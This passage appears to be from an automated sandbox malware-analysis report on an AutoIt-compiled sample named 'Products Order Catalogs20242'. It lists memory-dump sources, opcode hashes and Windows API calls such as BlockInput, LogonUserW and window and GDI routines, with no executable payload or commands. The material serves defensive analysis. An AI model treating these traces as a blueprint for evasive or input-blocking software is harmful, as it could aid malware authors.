                                                                                                • Instruction Fuzzy Hash: DE11E5766002049FD710EF6ADC89A5AF7E5EF84325F10892EF958D7281CB75E8048B94
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0vH$HH
                                                                                                • API String ID: 0-728391547
                                                                                                • Opcode ID: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                                                • Instruction ID: 538a6706abcc28c04bdc151be30d2aa4e2083a8dfdfa6c30a7857f36827e6882
                                                                                                • Opcode Fuzzy Hash: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                                                • Instruction Fuzzy Hash: 60E1BE725143109FC310EF25C881A9FB7E5AFC4708F108D2EF589AB281D779E946CB9A
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memset
                                                                                                • String ID:
                                                                                                • API String ID: 2102423945-0
                                                                                                • Opcode ID: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                                                • Instruction ID: fac722ae1e10b3ad9494cda40f9fb3e9e62b3c26aea04ddfc6562ea9d2065ebb
                                                                                                • Opcode Fuzzy Hash: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                                                • Instruction Fuzzy Hash: C512B4B7B983194FDB48DEE4DCC169573E1FB98304F09A43C9A15C7306F6E8AA094794
                                                                                                APIs
                                                                                                • DefDlgProcW.USER32(?,?,?,?,004A83D8,?), ref: 0047E22C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Proc
                                                                                                • String ID:
                                                                                                • API String ID: 2346855178-0
                                                                                                • Opcode ID: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                                                • Instruction ID: e1c03c818efbd3cbf3664a0c3e659178dbc9a05004c0f073233894ce1d713c90
                                                                                                • Opcode Fuzzy Hash: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                                                • Instruction Fuzzy Hash: 4EB1E63330602429E114916BBC88EBFBB9CD7D677BB208B7FF142C1582DB5B6425A179
                                                                                                APIs
                                                                                                • BlockInput.USER32(00000001), ref: 0045A272
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: BlockInput
                                                                                                • String ID:
                                                                                                • API String ID: 3456056419-0
                                                                                                • Opcode ID: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                                                • Instruction ID: 5d782454ef4d0180448527013755d2523f66e5fc327f68786c1d80a86620ac83
                                                                                                • Opcode Fuzzy Hash: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                                                • Instruction Fuzzy Hash: D2E04F752043019BC700EF71C545A5BB7E4AF94314F108C6EF845A7351D775AC45CB66
                                                                                                APIs
                                                                                                • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 0043918E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: LogonUser
                                                                                                • String ID:
                                                                                                • API String ID: 1244722697-0
                                                                                                • Opcode ID: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                                • Instruction ID: 63114e5cfb2c4979e73f5d19eacf740c811f86df1a08bc2cb556a5e36cce81ff
                                                                                                • Opcode Fuzzy Hash: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                                • Instruction Fuzzy Hash: 8DD0ECB52686066FD204CB24D846E2B77E9A7C4701F008A0CB196D2280C670D805CA32
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: NameUser
                                                                                                • String ID:
                                                                                                • API String ID: 2645101109-0
                                                                                                • Opcode ID: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                                                • Instruction ID: 8011c19b6c32d183c263453b2018abc548473ce9ed5616c99acac4896e71f792
                                                                                                • Opcode Fuzzy Hash: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                                                • Instruction Fuzzy Hash: F6E08C322083058FC310EF55F8405ABB390EB94311F004C3FE64AA2191DA79920EDFAB
                                                                                                APIs
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00021FEC), ref: 00422033
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                • String ID:
                                                                                                • API String ID: 3192549508-0
                                                                                                • Opcode ID: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                                                • Instruction ID: 3275b40964251646410af8875a24301f93fa315c26af6adae0ca3d0f7a721f84
                                                                                                • Opcode Fuzzy Hash: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                                                • Instruction Fuzzy Hash: CD9002743511144A4A011BB16E5D90925D46A586067920875B411C4064DB9840019619
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                • Instruction ID: b3f199f19983f506b623bfe7955a95149e6efe4e98ce3416cc40fa12ddcf4508
                                                                                                • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                • Instruction Fuzzy Hash: 46D19073C0A9B30A8735812D42582BFEE626FD578131EC3E29CD07F38AD26B5DA195D4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                • Instruction ID: c47bdb3f9c9e38c5d46ddb9e43dedaf70276048770aeb58bd274f21c588a824b
                                                                                                • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                • Instruction Fuzzy Hash: 1CD19073D1A9B30A8735852D42581AFEE626FD578031EC3E2CCD07F38AD16B5DA191D4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                • Instruction ID: ac15b8da1a4b082d71a0b082c8349c97121379a14580263daf363e6ab8f75410
                                                                                                • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                • Instruction Fuzzy Hash: 87C18173C0A9B30A8736812D42641AFEE626FD579031FC3E2CCD47F38A91AB5DA195D4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                • Instruction ID: aa957cafbedeae1199dea6a597ba911d219650f283d164fb65797e90308ef47b
                                                                                                • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                • Instruction Fuzzy Hash: 5FC18E73D0A9B30A8735812D42581AFEE626FD578031EC3E28CE46F38ED26F5DA195D4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                                                • Instruction ID: b8cfd58d412160527e66ace840abba843d94ac3f5b06779728c9fe736b8606cc
                                                                                                • Opcode Fuzzy Hash: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                                                • Instruction Fuzzy Hash: ECD012F621844146F33144D866C0BD100437344310FB58C276005CEBC1C0DDECD6C229
                                                                                                APIs
                                                                                                • DeleteObject.GDI32(?), ref: 004593D7
                                                                                                • DeleteObject.GDI32(?), ref: 004593F1
                                                                                                • DestroyWindow.USER32(?), ref: 00459407
                                                                                                • GetDesktopWindow.USER32 ref: 0045942A
                                                                                                • GetWindowRect.USER32(00000000), ref: 00459431
                                                                                                • SetRect.USER32(50000001,00000000,00000000,000001F4,?), ref: 00459568
                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00459577
                                                                                                • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,?,?,50000001,?,?,00000000,00000000), ref: 004595BB
                                                                                                • GetClientRect.USER32(00000000,?), ref: 004595C8
                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00459615
                                                                                                • CreateFileW.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459635
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459654
                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 0045965F
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00459668
                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459678
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0045967F
                                                                                                • CloseHandle.KERNEL32(00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459686
                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,50000001,?,?,00000000,00000000,00000000), ref: 00459694
                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,000001F4), ref: 004596AD
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004596C0
                                                                                                • CopyImage.USER32(000000FF,00000000,00000000,00000000,00002000), ref: 004596EF
                                                                                                • SendMessageW.USER32(00000000,00000172,00000000,000000FF), ref: 00459712
                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,50000001,?,?,00000000,00000000,00000000), ref: 0045973D
                                                                                                • ShowWindow.USER32(?,00000004,?,50000001,?,?,00000000,00000000,00000000), ref: 0045974B
                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,?,?,0000000B,0000000B,?,?,?,00000000,00000000), ref: 0045979C
                                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004597AD
                                                                                                • GetStockObject.GDI32(00000011), ref: 004597B7
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004597BF
                                                                                                • GetTextFaceW.GDI32(00000000,00000040,00000190,?,50000001,?,?,00000000,00000000,00000000), ref: 004597CD
                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004597D6
                                                                                                • DeleteDC.GDI32(00000000), ref: 004597E1
                                                                                                • _wcslen.LIBCMT ref: 00459800
                                                                                                • _wcscpy.LIBCMT ref: 0045981F
                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 004598BB
                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004598D0
                                                                                                • GetDC.USER32(?), ref: 004598DE
                                                                                                • SelectObject.GDI32(00000000,?), ref: 004598EE
                                                                                                • SelectObject.GDI32(00000000,?), ref: 00459919
                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00459925
                                                                                                • MoveWindow.USER32(?,0000000B,?,?,?,00000001), ref: 00459943
                                                                                                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 00459951
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                                • API String ID: 4040870279-2373415609
                                                                                                • Opcode ID: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                                                • Instruction ID: fce7466cc8f2b4b34a2e278d60cb4f704f90ff1017bfb666dbfc83d8aba9d67a
                                                                                                • Opcode Fuzzy Hash: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                                                • Instruction Fuzzy Hash: 3F028C70204301EFD714DF64DE89F2BB7A8AB84705F104A2DFA45AB2D2D7B4E805CB69
                                                                                                APIs
                                                                                                • GetSysColor.USER32(00000012), ref: 00441E64
                                                                                                • SetTextColor.GDI32(?,?), ref: 00441E6C
                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00441E83
                                                                                                • GetSysColor.USER32(0000000F), ref: 00441E8F
                                                                                                • SetBkColor.GDI32(?,?), ref: 00441EAA
                                                                                                • SelectObject.GDI32(?,?), ref: 00441EBA
                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00441EF0
                                                                                                • GetSysColor.USER32(00000010), ref: 00441EF8
                                                                                                • CreateSolidBrush.GDI32(00000000), ref: 00441EFF
                                                                                                • FrameRect.USER32(?,?,00000000), ref: 00441F10
                                                                                                • DeleteObject.GDI32(?), ref: 00441F1B
                                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 00441F75
                                                                                                • FillRect.USER32(?,?,?), ref: 00441FB6
                                                                                                  • Part of subcall function 00433D5C: GetSysColor.USER32(0000000E), ref: 00433D81
                                                                                                  • Part of subcall function 00433D5C: SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                                                  • Part of subcall function 00433D5C: GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                                                                                                  • Part of subcall function 00433D5C: GetSysColor.USER32(0000000F), ref: 00433DCB
                                                                                                  • Part of subcall function 00433D5C: GetSysColor.USER32(00000011), ref: 00433DEB
                                                                                                  • Part of subcall function 00433D5C: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                                                  • Part of subcall function 00433D5C: SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                                                  • Part of subcall function 00433D5C: SetBkColor.GDI32(?,?), ref: 00433E19
                                                                                                  • Part of subcall function 00433D5C: SelectObject.GDI32(?,?), ref: 00433E29
                                                                                                  • Part of subcall function 00433D5C: InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                                                                                                  • Part of subcall function 00433D5C: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                                                  • Part of subcall function 00433D5C: GetWindowLongW.USER32 ref: 00433E8A
                                                                                                  • Part of subcall function 00433D5C: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                                                • String ID:
                                                                                                • API String ID: 69173610-0
                                                                                                • Opcode ID: 63a2be33accb074b4178bb2d7a96f271ea41f5903b36f57aa3a0bb7ff7b8698e
                                                                                                • Instruction ID: 0b0c06e318eae1aa70623bc76f746578ebcda4f465cb69034399d4c57c44293d
                                                                                                • Opcode Fuzzy Hash: 63a2be33accb074b4178bb2d7a96f271ea41f5903b36f57aa3a0bb7ff7b8698e
                                                                                                • Instruction Fuzzy Hash: BBB14D71508300AFD314DF64DD88A6FB7F8FB88720F504A2DF996922A0D774E845CB66
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: __wcsnicmp
                                                                                                • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                                                • API String ID: 1038674560-3360698832
                                                                                                • Opcode ID: c74d0d52908dbbec4f5022c33a9c4844136c2b84c95de0bb8b15b994b6f8f789
                                                                                                • Instruction ID: b6083b7aed1673b33e689ff2aa7e8f17f47d7310e90ec65f4167159f85ee96f3
                                                                                                • Opcode Fuzzy Hash: c74d0d52908dbbec4f5022c33a9c4844136c2b84c95de0bb8b15b994b6f8f789
                                                                                                • Instruction Fuzzy Hash: 5A611471B4071076EA306A229C46FAB735CDF14345F50052FFC01A628BE7ADDA4A86EE
                                                                                                APIs
                                                                                                • GetSysColor.USER32(0000000E), ref: 00433D81
                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                                                • GetSysColor.USER32(00000012), ref: 00433DA3
                                                                                                • SetTextColor.GDI32(?,?), ref: 00433DAB
                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                                                                                                • GetSysColor.USER32(0000000F), ref: 00433DCB
